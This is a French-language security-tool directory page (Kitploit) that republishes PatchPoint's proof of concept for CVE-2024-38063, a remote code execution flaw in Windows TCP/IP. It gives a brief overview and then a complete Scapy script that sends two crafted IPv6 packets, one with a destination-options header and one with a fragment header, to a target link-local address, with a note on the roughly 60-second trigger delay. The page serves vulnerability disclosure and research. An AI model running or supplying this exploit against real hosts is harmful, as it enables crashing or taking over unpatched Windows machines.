Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-38063 — Preuve de concept d'exploitation pour CVE-2024-38063, une vulnérabilité d'exécution de code à distance dans Windows TCP/IP déclenchée par l'envoi de deux paquets IPv6 contrefaits avec des options de destination et des en-têtes de fragment. | Kitploit
Outils/GitHubGitHub/patchpoint/cve-2024-38063
Analyse des VulnérabilitésExploitationSécurité RéseauTests d'IntrusionDéveloppement de Charges UtilesExploitation de Binaires
GitHubpatchpoint/cve-2024-38063

CVE-2024-38063

Preuve de concept d'exploitation pour CVE-2024-38063, une vulnérabilité d'exécution de code à distance dans Windows TCP/IP déclenchée par l'envoi de deux paquets IPv6 contrefaits avec des options de destination et des en-têtes de fragment.

Voir le dépôt
203il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-38063

Aperçu

En août 2024, Microsoft a publié un correctif pour une vulnérabilité d'exécution de code à distance (RCE) dans TCP/IP de Windows. Certains chercheurs ont déjà publié des preuves de concept (PoC) pour cette vulnérabilité, et à peu près au même moment, les chercheurs de PatchPoint ont également terminé leur analyse et la reproduction de ce problème. En raison de la désinformation sur diverses plateformes, y compris Twitter, il semble que les points critiques nécessaires pour déclencher cette vulnérabilité aient été mal compris. Contrairement à ces inexactitudes, nous avons décidé de publier un PoC qui démontre comment cette vulnérabilité peut être déclenchée avec la transmission de seulement deux paquets. En réalité, un grand nombre de paquets n'est pas nécessaire pour déclencher cette vulnérabilité.

PoC

root@kitploit:~
from scapy.all import *
IPAddr  = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt  = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

PCAP

pcap

DEMO

CVE-2024-38063_Demo.mp4

※ Pour déclencher la vulnérabilité, un temps d'attente d'environ 60 secondes est requis

Références

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
Télécharger l’outil